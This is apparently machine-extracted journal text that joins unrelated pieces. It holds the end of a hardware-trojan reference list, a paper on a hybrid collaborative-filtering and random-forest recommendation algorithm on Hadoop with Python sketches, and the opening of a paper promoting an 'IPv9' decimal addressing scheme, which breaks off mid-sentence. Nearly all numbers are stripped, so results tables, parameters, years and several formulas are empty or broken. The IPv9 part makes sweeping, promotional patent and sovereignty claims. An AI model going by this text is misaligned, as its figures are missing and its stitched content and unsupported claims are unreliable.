design of viterbi decoder. in: nd international conference on advances in electrical, electronics, information, communication and bio-informatics (aeeicb). chennai: ieee, – . narasimhan s, du d, chakraborty rs, paul s, wolff fg, papachristou ca, roy k, bhunia s. . hardware trojan detection by multiple-parameter side-channel analysis. ieee transactions on computers ( ): – doi . /tc. . . ranjani rs, devi mn. . malicious hardware detection and design for trust: an analysis. elektrotehniski vestnik ( / ): – . realterm. . serial/tcp terminal. available at https://sourceforge.net/projects/realterm/ (accessed april ). kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 
saeidi r, garakani hg. . sram hardware trojan. in: th international symposium on telecommunications (ist). tehran: ieee, – . subramani ks, antonopoulos a, abotabl aa, nosratinia a, makris y. . demonstrating and mitigating the risk of a fec-based hardware trojan in wireless networks. ieee transactions on information forensics and security ( ): – . sweeney p. . error control coding: from theory to practice. new york: john wiley & sons. tehranipoor m, koushanfar f. . a survey of hardware trojan taxonomy and detection. ieee design & test of computers ( ): – . tiwari b, yang m, jiang y, wang x. . effect of hardware trojan attacks on the performance of on-chip multicast routing algorithms. in: ieee th annual computing and communication workshop and conference (ccwc). las vegas: ieee, – . trusthub. . trojan benchmarks. available at https://trust-hub.org/benchmarks/trojan (accessed august ). viterbi a. . error bounds for convolutional codes and an asymptotically optimum decoding algorithm. ieee transactions on information theory ( ): – .

international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- -
research on commodity mixed recommendation algorithm
chang hao, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com; yang shengquan, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
abstract—with the advent of the era of big data, our lives generate huge amounts of data every day, and the field of e-commerce is no exception. it is particularly important to analyze these data and recommend products. it is reported that, through its recommendation algorithm, amazon has increased its sales by about %. among recommendation algorithms, the collaborative filtering algorithm is currently relatively mature and has achieved very good results in various fields. but the traditional collaborative filtering algorithm is too rough when calculating the similarity and the prediction score, and its efficiency is very low. we combine the traditional collaborative filtering algorithm with the decision tree algorithm, improve the traditional recommendation algorithm, create a collaborative filtering decision tree algorithm to recommend products, and run the new collaborative filtering decision tree algorithm on the hadoop platform. experiments show that the improved algorithm significantly improves the accuracy of recommendation.
keywords-e-commerce; recommendation algorithm; decision tree; collaborative filtering
i. introduction
with the development of science and technology, internet technology has also developed and spread rapidly, so that the data on the network is growing at the level of pb every day, bringing a wealth of information resources to users and greatly enriching people's daily lives. however, the problem of the rapid expansion of this large volume of information resources has also emerged: "information overload" is a problem that internet users are facing. "information overload" refers to the difficulty for internet users to accurately and quickly locate the information they need from massive data [ ]. the emergence of recommendation systems has greatly eased the problem of "information overload".
the recommendation system automatically and intelligently recommends items for users, and it dynamically adjusts the recommended item types according to changes in user behavior, which truly mitigates the "information overload" problem. faced with such a huge amount of data, it is necessary to adopt a big data model for analysis. compared with the traditional data model that uses random analysis (sampling surveys), the big data model analyzes all the data and has the characteristics of the four vs, namely large volume, high velocity, variety and value. the collaborative filtering algorithm is one of the most concise and practical recommendation algorithms. using a traditional sampling-based data model would inevitably aggravate the sparsity problem of the algorithm itself, so it is both significant and necessary to design a big data model based on collaborative filtering. processing big data cannot be realized on a single computer, so the application of a distributed architecture is particularly important, and the algorithm model is therefore run under the hadoop distributed framework. mapreduce is a distributed computing framework under hadoop [ ]. it uses the "divide and conquer" idea to decompose complex tasks or data into several simple tasks for parallel processing, and afterwards performs a global summarization, which greatly improves the efficiency of the algorithm. this article mainly studies a distributed recommendation algorithm on the hadoop platform. the recommendation algorithm combines the decision tree and the collaborative filtering algorithm, and improves the traditional collaborative filtering algorithm to improve the timeliness of recommendation.
ii. introduction to related technologies
a. introduction to the traditional collaborative filtering algorithm
the collaborative filtering algorithm is the most successful information filtering algorithm used in current recommendation systems. the main method is to extract the historical behaviors generated by users to make recommendations. the traditional collaborative filtering algorithm is mainly divided into the item-based collaborative filtering algorithm (itemcf) and the user-based collaborative filtering algorithm (usercf) [ ]. the core process of a collaborative filtering algorithm is as follows: collect user preferences, find similar users or items, and calculate recommendations; the core of this process is the calculation of similarity. the euclidean distance similarity method (formula 1), the pearson correlation coefficient similarity method (formula 2), the salton similarity method (formula 3) and the cosine similarity method (formula 4) are several common similarity calculation methods [ ]:

o(x, y) = \sqrt{\sum_i (x_i - y_i)^2}    (1)

p(x, y) = \frac{n \sum_i x_i y_i - \sum_i x_i \sum_i y_i}{\sqrt{n \sum_i x_i^2 - (\sum_i x_i)^2} \cdot \sqrt{n \sum_i y_i^2 - (\sum_i y_i)^2}}    (2)

s(u, v) = \frac{|N(u) \cap N(v)|}{\sqrt{|N(u)|} \cdot \sqrt{|N(v)|}}    (3)

\cos(x, y) = \frac{\sum_i x_i y_i}{\sqrt{\sum_i x_i^2} \cdot \sqrt{\sum_i y_i^2}}    (4)
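as an illustration of these measures, the fragment below computes the pearson and cosine similarities of formulas (2) and (4) for two users' rating vectors. it is a minimal python sketch with invented example ratings, not code from the paper.

```python
# Minimal illustration of the similarity measures in formulas (2) and (4).
# The two rating vectors are invented example data, not taken from the paper.
import math

def cosine_similarity(x, y):
    """Formula (4): dot product divided by the product of the vector norms."""
    num = sum(a * b for a, b in zip(x, y))
    den = math.sqrt(sum(a * a for a in x)) * math.sqrt(sum(b * b for b in y))
    return num / den if den else 0.0

def pearson_similarity(x, y):
    """Formula (2): n*sum(xy) - sum(x)*sum(y), over the product of the two spread terms."""
    n = len(x)
    num = n * sum(a * b for a, b in zip(x, y)) - sum(x) * sum(y)
    den = math.sqrt(n * sum(a * a for a in x) - sum(x) ** 2) * \
          math.sqrt(n * sum(b * b for b in y) - sum(y) ** 2)
    return num / den if den else 0.0

user_a = [5, 3, 0, 1]   # example ratings of user a over four items
user_b = [4, 3, 0, 1]   # example ratings of user b over the same items
print(cosine_similarity(user_a, user_b), pearson_similarity(user_a, user_b))
```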
b. introduction to decision tree
the decision tree is a typical classification algorithm. it first processes the data, uses inductive algorithms to generate readable rules and a decision tree, and then uses the decisions to analyze new data. after obtaining the recommended products in the previous step, features are extracted [ ]. a data set yields many features, but which feature should be selected as the root node, and which feature is the optimal split? at this point we need to introduce a new measure, entropy. entropy refers to the uncertainty of a random variable, and is calculated as shown in formula (5):

h(x) = -\sum_{i=1}^{n} p_i \log_2 p_i    (5)

where p_i represents the probability of each feature. it can be seen from the formula that the greater the probability and the greater the purity, the smaller the entropy value, and the smaller the entropy value, the more stable the feature. there are three selection criteria for features: information gain (id3), information gain rate (c4.5) and the gini index (cart). decision trees are developing rapidly, and many excellent algorithms have been derived from them, such as gbdt (gradient boosting decision tree) and rf (random forest). decision trees have considerable advantages in terms of accuracy and are used frequently in various competitions with very good results; at times, a painstakingly built neural network is not as accurate as the comparatively simple random forest, so this article uses the random forest to optimize the algorithm.
iii. recommended algorithm design
the collaborative filtering algorithm is the most widely used algorithm in recommendation systems. because of the versatility of the model, it does not require much expertise in the corresponding data field, the engineering implementation is relatively simple, and the effect is good, so it is widely praised. but collaborative filtering has its own problems: "cold start" and "sparseness" have always been inherent issues. therefore, in the context of today's big data era, collaborative filtering may not be suitable as a direct recommendation algorithm. to solve this problem, this paper designs a hybrid recommendation algorithm.
a. random forest
because a single decision tree has obvious drawbacks in a recommendation system, a random forest composed of multiple decision trees can effectively solve the problems of a single decision tree. in essence, the decision tree is a special tree containing many judgment nodes, and the random forest model is composed of multiple decision trees [ ]. the main idea of the random forest algorithm is to combine several single classifiers into one large classifier, which mainly includes the following three steps:
step 1: randomly sample the training subsets for the decision trees to be generated. as many decision trees as are needed, that many training subsets should be drawn. this step uses a statistical sampling method to extract several training subsets from the original training set; the sampling method used in this work is based on the bagging idea. when the training set is sampled, sampling is done with replacement so that every sample has an equal and random chance of being selected.
step 2: build the decision trees. the decision trees constructed from the training subsets selected in the first step are the main elements of the random forest. the construction of these trees is not restricted by any factors, and no pruning is performed on them. when constructing a decision tree, not all attributes in the data set are selected as indicators for calculation; instead, several feature attributes are randomly selected as candidate "optimal" features, and the node is split on the best of these k < K candidates. in the decision tree, the c4.5
algorithm is used as the splitting algorithm for attribute selection, and the information gain rate algorithm is given. according to the randomness peculiar to the random forest, first select k attributes as the features of the decision tree. these features all act as classifiers. from the calculation of the training set, we can know the classification standard h(x, θ) ∈ ( , ), x ∈ rn is a randomly selected training sample. θ = (α,φ) represents the parameter of this node, φ represents the matrix, α represents the filtering function, and the surface style of the node feature is determined by α, the formula represents the calculation of the nonlinear plane, and the calculation formula of the linear plane is formula : h(x, θ) = δ(αt(x)φ > ) ( ) h(x, θ) = δ(αt(x)φα(x) > ) ( ) use a recursive method to operate on the data set until the data on a node has all belonged to the same type of feature or the number of data sets on the node has reached the threshold set in advance, then this node will stop continuing to classify, converted to a leaf node. if the above requirements are not met, the node will continue to randomly search for feature attributes for classification. step : the formation of the forest. after repeating the first step and the second step several times, the resulting trees can be used to build random forests. first of all, according to the function of these trees, you can classify the training set, integrate the results of the data set processed by the decision tree, and vote. the final output of the algorithm is the result of the classification with the most votes. b. ahp model ahp (analytic hierarchy process) is a method for making decisions based on the weight of layers. this method through further exploration and analysis of the root of more complex problems and their influencing factors, further proposed a qualitative method to quantify the problem, so as to provide more detailed quantitative information for decision-making. in this research, we adopt the method of analysing the weight of influencing factors in the analytic hierarchy process, and give corresponding weights to different operation behaviors, and then determine the similarity between different users and the similarity between different brands according to the obtained weights degree. the following is the specific process of calculating the weights: step : decision-level analysis. first of all, through in-depth study of the problem, in the research process, the factors that have related relationships are analyzed and compared with each other, and each factor is arranged in layers to form a multi-layered hierarchical structure model. through the analysis, we can know that the following four factors have the most impact on the user's future purchases: the number of user clicks on the product, whether the user has added the product to the shopping cart, whether the user has collected the product, and whether the user has purchased the product. formed a structural model as shown below: figure . hierarchical model diagram step : construct the judgment matrix. first of all, it is necessary to compare all the influencing factors with each other. in the measurement, the introduction of relative scale is used to reduce the difficulty of comparing two different factors with each other, which further improves the accuracy. if you want to compare the influence of n elements a , a , … , an on the same goal, you will obtain two factors aiand aj each time. 
The element c_ij represents the ratio of the influence of a_i to that of a_j with respect to the goal. All of the comparison results can be written as a comparison matrix:

C = (c_{ij})_{n \times n}, \quad c_{ij} > 0, \quad c_{ji} = \frac{1}{c_{ij}}

The larger the value of c_ij, the higher the importance of a_i relative to a_j. In general, the differences between the factors are expressed on a small, bounded relative scale (classical AHP uses small integers and their reciprocals).

Step 3: Solve and test. The elements of the weight vector W are the ranking weights of the relative importance of the factors at one level with respect to a factor at the previous level; this process is called hierarchical single sorting. Whether the hierarchical single sorting can be accepted then requires a consistency test. The consistency test refers to the allowed range of inconsistency of the pairwise comparison matrix. The consistency index is defined as

CI = \frac{\lambda_{max} - n}{n - 1}

Different CI values have different meanings: the greater the CI, the more serious and obvious the inconsistency. The consistency ratio is defined as CR = CI / RI, where RI is the random consistency index, whose values are listed in Table I (RI value table).

C. Improved collaborative filtering algorithm

The random forest also has its own drawback: it can only recommend brands that users have already been in contact with, and it will not recommend brands the user has never interacted with, even if such a brand may meet the user's needs. The AHP-improved collaborative filtering algorithm is proposed to solve this problem [ ]. The improvement proceeds through the following steps.

Step 1: Use the AHP model to find the weights of user behaviors. When calculating user similarity and brand similarity, the collaborative filtering recommendation algorithm cannot treat all types of user interaction equally. Therefore, the AHP model is used to assign a weight to each type of user behavior. With this set of weights, the similarity between user profiles and between brand profiles can be calculated, which addresses the drawback of plain collaborative filtering. This set of weights can be obtained with the AHP analysis model introduced in the previous section.

Step 2: Compute the user's rating data for each brand. Users score products on the e-commerce website, and the size of the rating reflects the user's preference for the brand; therefore, before calculating user similarity and brand similarity, the user's rating value for each brand must first be computed. It can be obtained from the types and frequencies of the user's operations:

r_{u,i} = \sum_{c=1}^{C} op(c) \cdot fp(c)

where u denotes the user, i denotes the brand, r_{u,i} is the user's rating of the brand, op(c) is the weight of operation type c, and fp(c) is the frequency of the user's operations of that type on the brand. From this, the ratings r_{u,i} can be arranged in the matrix

\begin{bmatrix} r_{11} & r_{12} & \cdots & r_{1n} \\ r_{21} & r_{22} & \cdots & r_{2n} \\ \vdots & \vdots & \ddots & \vdots \\ r_{m1} & r_{m2} & \cdots & r_{mn} \end{bmatrix}

which reflects how users and brands interact with each other. Based on it, the similarity between users and between brands can be calculated.

Step 3: Calculate the similarity. This is the most important part of the collaborative filtering recommendation algorithm; this article uses an attribute-based similarity method.
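Before moving on to the similarity formulas, the following is a small illustrative Python/NumPy sketch of the two steps just described: deriving behavior weights from an AHP comparison matrix (including the CI/CR consistency check) and turning operation frequencies into a weighted rating r_{u,i}. The example comparison values and the CR < 0.1 acceptance threshold are conventional choices rather than values from this paper, and the RI entries are the commonly cited Saaty values (the paper's own Table I was not preserved).

```python
import numpy as np

# Commonly cited random-consistency-index (RI) values for matrix orders 1..9.
RI = {1: 0.0, 2: 0.0, 3: 0.58, 4: 0.90, 5: 1.12, 6: 1.24, 7: 1.32, 8: 1.41, 9: 1.45}

def ahp_weights(C):
    """Priority weights from a pairwise comparison matrix C (c_ij > 0, c_ji = 1/c_ij),
    taken as the normalised principal eigenvector, plus CI and CR."""
    C = np.asarray(C, dtype=float)
    n = C.shape[0]
    eigvals, eigvecs = np.linalg.eig(C)
    k = np.argmax(eigvals.real)                  # principal eigenvalue lambda_max
    w = np.abs(eigvecs[:, k].real)
    w = w / w.sum()                              # ranking weights
    ci = (eigvals[k].real - n) / (n - 1)         # consistency index
    cr = ci / RI[n] if RI.get(n, 0) > 0 else 0.0 # consistency ratio (CR < 0.1 is usually accepted)
    return w, ci, cr

def rating(op_weights, op_freqs):
    """Behaviour-weighted rating r_{u,i} = sum_c op(c) * fp(c)."""
    return float(np.dot(op_weights, op_freqs))

# Hypothetical pairwise comparisons of click / favourite / add-to-cart / purchase.
C = [[1, 1/3, 1/5, 1/7],
     [3, 1,   1/3, 1/5],
     [5, 3,   1,   1/3],
     [7, 5,   3,   1]]
w, ci, cr = ahp_weights(C)
# Weighted rating for a user who clicked 7 times, favourited once, carted once, never bought.
r_ui = rating(w, [7, 1, 1, 0])
```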
The similarity computation processes the information about a user and its nearest neighbours; the core of the algorithm is that, once the nearest neighbours are obtained, they are analysed to produce the user's comprehensive similarity, as follows. The user's rating similarity ysd_1(u, i) is given by

ysd_1(u, i) = \frac{\sum_{t \in I_{u,i}} (r_{u,t} - A_u)(r_{i,t} - A_i)}{\sqrt{\sum_{t \in I_u} (r_{u,t} - A_u)^2 \cdot \sum_{t \in I_i} (r_{i,t} - A_i)^2}}

This formula compares users u and i. r_{u,t} and r_{i,t} are the ratings of users u and i for brand t; I_u denotes the set of brands rated by user u and I_i the set of brands rated by user i; I_{u,i} is the set of brands rated by both. A_u is the average rating of user u over I_u, and A_i is the average rating of user i over I_i.

The user's feature similarity ysd_2 is computed as

d(u, i) = \sqrt{\sum_{k=1}^{n} (u_k - i_k)^2}

ysd_2(u, i) = \frac{1}{1 + d(u, i)}

Here d(u, i) is the Euclidean metric (Euclidean distance) between users u and i, n is the dimension of the user feature vector, and u_k and i_k are the k-th feature values of users u and i, respectively. ysd_2 expresses the similarity of the features of users u and i.

Given the rating similarity ysd_1 and the feature similarity ysd_2, the user's comprehensive similarity ysd is computed as

ysd(u, i) = w_1 \cdot ysd_1(u, i) + (1 - w_1) \cdot ysd_2(u, i)

where w_1 is the combination weight of the comprehensive similarity; its actual value is determined by how strongly the rating similarity and the feature similarity influence the comprehensive similarity. The calculation of brand similarity is the same as that of user similarity with the parameters changed, and is not described in detail here.

Step 4: Select the nearest neighbours. To achieve accurate recommendation, the neighbour users that match the target user's interests must be located precisely, so the selection of the nearest neighbours is very important. To select the user's nearest neighbours and the brand's nearest neighbours, this article uses the top-N method: first the similarity between all other users (or brands) and the target user (or brand) is calculated, and then the similarity values are sorted.

Step 5: Generate recommendations. Using the method of the previous step, the nearest-neighbour set N_u[u] of the target user is obtained, and recommendations for the user are produced according to

p_u(t, u) = A_u + \frac{\sum_{i=1}^{c} (r_{i,t} - A_i) \cdot ysd(u, i)}{\sum_{i=1}^{c} ysd(u, i)}

where A_u is the average score of user u over all brands in the data set, c is the number of users in the nearest-neighbour set of user u, r_{i,t} is the rating of brand t by the nearest-neighbour user i, and ysd(u, i) is the comprehensive similarity between the users. p_u expresses the degree to which brand t is recommended to user u on the basis of user-based recommendation. The brand-based recommendation follows the same idea and is not elaborated further.
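A minimal Python sketch of these formulas is given below. It is illustrative only: the data structures (ratings stored as per-user dictionaries, users described by feature vectors) and the default combination weight w1 = 0.5 are our assumptions, not values specified in the paper.

```python
import numpy as np

def rating_similarity(r_u, r_i):
    """ysd1: rating similarity over the brands both users have rated.
    r_u, r_i are dicts mapping brand -> rating."""
    common = set(r_u) & set(r_i)
    if not common:
        return 0.0
    a_u = np.mean(list(r_u.values()))            # average rating of user u
    a_i = np.mean(list(r_i.values()))            # average rating of user i
    num = sum((r_u[t] - a_u) * (r_i[t] - a_i) for t in common)
    den = np.sqrt(sum((r_u[t] - a_u) ** 2 for t in r_u) *
                  sum((r_i[t] - a_i) ** 2 for t in r_i))
    return num / den if den else 0.0

def feature_similarity(f_u, f_i):
    """ysd2 = 1 / (1 + Euclidean distance) over user feature vectors."""
    d = np.sqrt(np.sum((np.asarray(f_u, float) - np.asarray(f_i, float)) ** 2))
    return 1.0 / (1.0 + d)

def combined_similarity(r_u, r_i, f_u, f_i, w1=0.5):
    """ysd = w1 * ysd1 + (1 - w1) * ysd2; w1 is a tunable combination weight."""
    return w1 * rating_similarity(r_u, r_i) + (1 - w1) * feature_similarity(f_u, f_i)

def predict(u, brand, ratings, features, neighbours):
    """Predicted preference p_u(brand, u) using the top-N neighbour set of user u."""
    a_u = np.mean(list(ratings[u].values()))
    num = den = 0.0
    for i in neighbours:                          # users most similar to u
        if brand not in ratings[i]:
            continue
        a_i = np.mean(list(ratings[i].values()))
        s = combined_similarity(ratings[u], ratings[i], features[u], features[i])
        num += (ratings[i][brand] - a_i) * s
        den += s
    return a_u + num / den if den else a_u
```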
D. Fusion of the two algorithms

Having introduced the basic characteristics of the random forest recommendation algorithm and of the collaborative filtering recommendation algorithm, together with the parameters and calculation processes they require, we now exploit their complementary characteristics. For example, the random forest model can recommend brands that a user has interacted with before, while the collaborative filtering algorithm can recommend brands the user has not yet interacted with. If the two models are combined well, their respective advantages reinforce each other and their weaknesses are avoided: all the information required for user recommendation can be covered, better recommendation results are naturally obtained, and the accuracy of the model is further improved. The figure "Schematic diagram of the algorithm fusion process" shows the fusion strategy of the two models in detail.

IV. Experiment and Result Analysis

A. Experimental data and experimental environment

To verify the efficiency of the improved algorithm model, we selected an e-commerce company's internal data set for testing and analysed and evaluated its performance. The data set contains all behaviors generated within one week by a large set of randomly sampled users of the e-commerce company; the user behaviors include clicks, favorites, add-to-cart operations, and purchases. Given the numbers of users, goods, and recorded actions, the data set is huge: with traditional stand-alone processing the time consumption would be immense, so performing distributed computation with the Hadoop system in a big data environment greatly improves the efficiency of the operation. The experimental environment is a Hadoop cluster with one master node and three slave nodes, all machines having the same configuration. The cluster is installed on the CentOS operating system, the JDK environment is configured for both CentOS and Windows, and the code is developed in the IDEA IDE on the Windows side.

B. Algorithm evaluation indices

1) Recall rate. The proportion of items in the recommended list produced by the algorithm that the consumer actually likes is the recall rate of the algorithm:

R(L_u) = \frac{|L_u \cap B_u|}{|B_u|}

where L_u is the set of items that user u likes and B_u is the list of products recommended to the consumer by the algorithm.

2) Accuracy. The accuracy of the algorithm measures the ratio of the items in the recommended list given by the system to the items that consumers actually like:

P(L_u) = \frac{|L_u \cap B_u|}{|L_u|}

with L_u and B_u defined as above.

3) F measure:

F = \frac{2 \cdot P \cdot R}{P + R}

Since the accuracy rate and the recall rate are negatively correlated, the F measure combines them, and the F score is taken as the deciding value. As can be seen from the formula, the prediction result should cover more users and brands while ensuring accuracy.
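For readers who want to experiment with the pieces described above, the following Python sketch shows (i) a bagged decision-tree ensemble built along the three steps of Section III.A, with the two parameters that the next subsection tunes (the number of trees and the number of randomly selected features), and (ii) the evaluation indices of Section IV.B. It is an illustration under our own assumptions: scikit-learn's trees use the CART criteria rather than C4.5, the data layout is hypothetical, and class labels are assumed to be small non-negative integers.

```python
import numpy as np
from sklearn.tree import DecisionTreeClassifier

def train_random_forest(X, y, n_trees=100, n_features=3, random_state=0):
    """Section III.A: (1) bootstrap-sample one training subset per tree,
    (2) grow each unpruned tree on a random subset of k < K features,
    (3) collect the trees into a forest."""
    rng = np.random.default_rng(random_state)
    X, y = np.asarray(X), np.asarray(y)
    forest = []
    for _ in range(n_trees):
        rows = rng.integers(0, len(X), size=len(X))               # sampling with replacement
        cols = rng.choice(X.shape[1], size=n_features, replace=False)
        tree = DecisionTreeClassifier()                           # unpruned; CART, not C4.5
        tree.fit(X[rows][:, cols], y[rows])
        forest.append((tree, cols))
    return forest

def forest_predict(forest, X):
    """Majority vote of all trees (labels assumed to be non-negative integers)."""
    X = np.asarray(X)
    votes = np.array([tree.predict(X[:, cols]) for tree, cols in forest])
    return np.array([np.bincount(v.astype(int)).argmax() for v in votes.T])

def recall_rate(liked, recommended):
    """R(L_u) as defined in Section IV.B: |L_u ∩ B_u| / |B_u|."""
    return len(set(liked) & set(recommended)) / len(recommended) if recommended else 0.0

def accuracy(liked, recommended):
    """P(L_u) as defined in Section IV.B: |L_u ∩ B_u| / |L_u|."""
    return len(set(liked) & set(recommended)) / len(liked) if liked else 0.0

def f_measure(p, r):
    """F = 2PR / (P + R)."""
    return 2 * p * r / (p + r) if (p + r) else 0.0
```

The two constructor arguments n_trees and n_features correspond to the parameters explored in the experiments that follow.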
random forest model experiment results there are two parameters that can be controlled by the random forest model, one is the number of random forest decision trees, and the other is the number of feature attributes that are randomly extracted to build the decision tree. the number of decision trees in the random forest model is krf , and the selected parameters are krf= , , , , , , , , , , and the following experimental results can be obtained: figure . the relationship between decision tree and result in random forest model it can be seen from the experimental result graph that the f value rises with the increase of the decision tree. after rising to , it basically tends to be gentle, so krf is taken as . also for the eigenvalues of random forests, not as many as possible, in order to ensure the stability of the model, through experiments, the following results are obtained: figure . the relationship between the number of features and the results in the random forest model international journal of advanced network, monitoring and controls volume , no. , it can be seen from the above experiment that when the number of decision trees is and the number of features is , the random forest model has the best effect, that is, the f value is the highest. the final experimental results of the random forest model are shown in the table below. table ii. random forest model final experimental results accuracy recall rate f measure . . . d. experimental results of the hybrid algorithm the weight of user behavior in the improved collaborative filtering algorithm can be calculated according to ahp, as shown in the following table: table iii. user behavior weight interaction type weight click . collection . add to cart . buy . the number n of brands recommended by the collaborative filtering algorithm is used as the parameter for the experiment. we take n = , , , , , and to conduct the experiment. the experimental results are shown in the figure. figure . the relationship between the recommended number of collaborative filtering algorithms and the result it can be seen from the experimental results that with the increase in the number of recommendations, the algorithm's recommendation performance is improving. when the number of brand recommendations is close to , the recommendation effect is the best. the final experimental results of the fusion of the final collaborative filtering recommendation algorithm and the random forest algorithm are shown in the following table: table iv. experimental results of fusion algorithm accuracy recall rate f measure . . . due to the large number of data sets in this experiment and the time-consuming operation in a single machine, the above operations are performed under the distributed system hadoop. in order to compare the advantages of hadoop in data processing speed, the collaborative filtering and the design the algorithm and the processing time of the algorithm designed in this paper are compared in the hadoop environment, as shown below: figure . time comparison chart because the algorithm in this paper is more accurate than the traditional collaborative filtering algorithm and the calculation is relatively complicated, the time efficiency is slightly insufficient. however, if it is run in a hadoop distributed cluster environment, the time efficiency is effectively improved by nearly times. it can be seen that the current big data in a large environment, it is necessary to use hadoop distributed clusters to process data. v. 
conclusion this paper attempts a model that uses different prediction and recommendation methods for prediction and recommendation, namely the random forest model, and gives a detailed introduction and further analysis of this model. this article also gives a detailed international journal of advanced network, monitoring and controls volume , no. , introduction to the basic principles of the traditional filtering algorithm of collaborative filtering, and thoroughly analyzes the advantages and disadvantages of the algorithm. for example, this traditional collaborative filtering algorithm lacks the ability to calculate the brand score of users. personalized investigation, treat all user behavior as the same. in view of the limitation of this traditional algorithm, this paper made some necessary improvements, and proposed the optimization of collaborative filtering similarity based on the weight of ahp. in addition, from two perspectives, user interaction and brand interaction, this article randomly integrates the collaborative filtering model with the random forest model. this will result in more accurate recommendation results, and the recall rate will naturally increase. finally, the data is analyzed through real data cases to obtain reliable experimental results. the results show that the combination of this analytic hierarchy process and collaborative filtering algorithm makes the recommendation performance better than a single collaborative filtering algorithm. and after being fused with the random forest model, compared with the single random forest algorithm or collaborative filtering algorithm, the performance has been greatly improved. references [ ] lu xiaocui. the application of big data analysis technology in cross- border e-commerce[j]. electronic technology and software engineering, ( ): - . [ ] tian bin. big data machine learning under the framework of distributed computing[j]. electronic technology and software engineering, ( ): - . [ ] yang wu, tang rui, lu ling. news recommendation method combining content-based recommendation and collaborative filtering[j]. computer applications, , ( ): - . [ ] yang hailong. power recommendation system based on item-based collaborative filtering algorithm[d]. lanzhou jiaotong university, . [ ] sheng wenshun, sun yanwen. an improved id decision algorithm and its application[j]. computer and digital engineering, , ( ): - + . [ ] wang jingna. research on used car valuation model based on random forest algorithm[d]. beijing jiaotong university, . [ ] cui yan, qi wei, pang hailong, zhao hui. a recommendation algorithm combining collaborative filtering and xgboost[j]. computer application research, , ( ): - . international journal of advanced network, monitoring and controls volume , no. , research on the technology of assign ip address to the connected computer based ipv wang hui school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com liu lingwen shandong radio, television and network co. ltd. tai'an branch e-mail: @ .com yu zhikai , chinese decimal network working group, shanghai, china shanghai decimal system network information technology ltd. e-mail: viktoryuzk@ .com li ming , chinese decimal network working group, shanghai, china shanghai decimal system network information technology ltd. 
e-mail: minxiaoli @ .com abstract—with the widely application of internet and the distribution is not reasonable in the beginning, the ipv address space is becoming less and less and there are fewer available ip addresses, in order to expand the address space, ipv was appeared, but it did not consider the network security in the first designing and have some shortcomings, it has not widely used in the world in its years. letf proposed some basic dreams of ipv in , and looked forward to the idea of network in the st century. however, due to the lack of research results of basic theories, technical problems of address exhaustion and layering, and development costs and other factors, it failed publicly. the ipv working group was disbanded in . on the basis of previous studies, chinese scholar and research team proposed a new internet architecture by using the decimal system (or the whole digital code) to assign ip addresses to the connected computers. this paper will research on the countless address of the new generation internet - ipv , and describe the characteristics of the new technology keywords-internet; ipv ; representation; characteristics i. the emergence of the new generation of the internet ipv is the most widely used protocol on the internet, and its address space is . in the early stage of the internet, due to the underestimation of the development trend of the internet, ip allocation was unreasonable, and ip resources were very limited. by , there was no address that could be allocated. in order to solve the problem of insufficient addresses, researches proposed ipv , ipv has addresses in theory, however, only one-eighth of the addresses can actually be allocated to end users. that is, the number of addresses that can be actually allocated is only , which is equivalent to . at present, barcodes are already having bits, and it cannot be covered, so ipv have some considerable limitations. in , chinese researcher proposed ipv — a method of using whole digital code to assign address for computer. in order to distinguish from ipv and doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ipv in the united states, the v in ipv proposed by china is uppercase, not lowercase. the patent for ipv includes three technologies: a new address coding design, a new addressing mechanism and a new address architecture design. these technologies constitute the core technology system at the bottom of the new generation ip network. the new network framework designed on this basis can form a network system that is connected and compatible with existing networks (internet using ipv and ipv technologies). ipv is not a simple upgrade of ipv and ipv , and its number of addresses is . the massive address of ipv can meet the needs of domain name address resources for human activities in years, and it is the simplest domain name address system. in , the authoritative professional institutions of the us government have confirmed legally and technically that china has the core technology of sovereign network with independent intellectual property rights under the ip framework. this is the patented technology of ipv which is different from the existing technology of the us internet. the official patent name is "method of using whole digital code to assign address for computer". the ipv protocol uses - arabic digital network as the virtual ip address and uses decimal as the text representation method, which is a convenient way to find online users. 
ipv has a large number of assignable ip addresses, and the maximum number of address bits is × . in order to improve efficiency and facilitate end users, some addresses can be used directly as domain names, which is the cornerstone of the future digital world. at the same time, ipv is also called "new generation security and reliable information integrated network protocol" because it uses the classification and coding of the original computer network, cable broadcast television network and telecommunication network. ipv obtained chinese patent in (cn ), and has obtained authorized patents successively in more than ten countries and regions, including south africa, turkey, kazakhstan, russia, south korea, north korea, hong kong, canada, singapore, australia, mexico and norway. ipv applied for us patent in . it was issued seven times of "non-final rejection opinion" and six final rejections by the us patent office. during this period, it was repeatedly criticized by senior members of the us ietf and famous american it companies. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was “very convincing”. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was "very convincing". ii. text representation of the ipv address the paper developed a representation of the ipv address, including the "parenthesis" notation, the "bracket" decimal representation, and the "brace" decimal notation. a. the parentheses notation since the default length of the ipv address is bits, there are still many bits in each segment, whether it is or segments. for example, when using segments, each segment still has bits. this will result in the following situation in one segment: ……] ]…… ……] ]…… such a situation not only makes the input cumbersome, but also tends to have fewer or more bits, which makes the user inconvenient because of dazzling. for convenience, the expression "parentheses"—— (k/l) has been introduced. where "k" represents international journal of advanced network, monitoring and controls volume , no. , or , and "l" represents the number of or . so the above two examples can be abbreviated as: ……]( / ) ]…… ……] ( / )]…… b. the bracket decimal representation ) representation of different digits of ipv address a) bits are represented by "[ ]". bits in "[ ]" are expressed in decimal, and the length can be indefinite. the "[]" can be omitted when writing in the browser. the representation of the -bit ipv address is "y[y[y[y[y[y[y[y ", each y in the address represents bits and can be expressed in decimal, which is = , so every y is a -digit decimal number. although the range of digits in decimal is ~ , it is stipulated in the paper that the range of the first digit from the left of y can only be ~ , so that no overflow occurs. an example of this method is as follows: [ [ [ [ [ [ [ in the address representation, multiple consecutive zeros on the left of each decimal number can be omitted, but the all-zero decimal number needs to be represented by a zero. for example, the above address can be written as: [ [ [ [ [ [ [ to further simplify the representation of the address, a consecutive all-zero fields in the address can be replaced with a square bracket [x] (x is 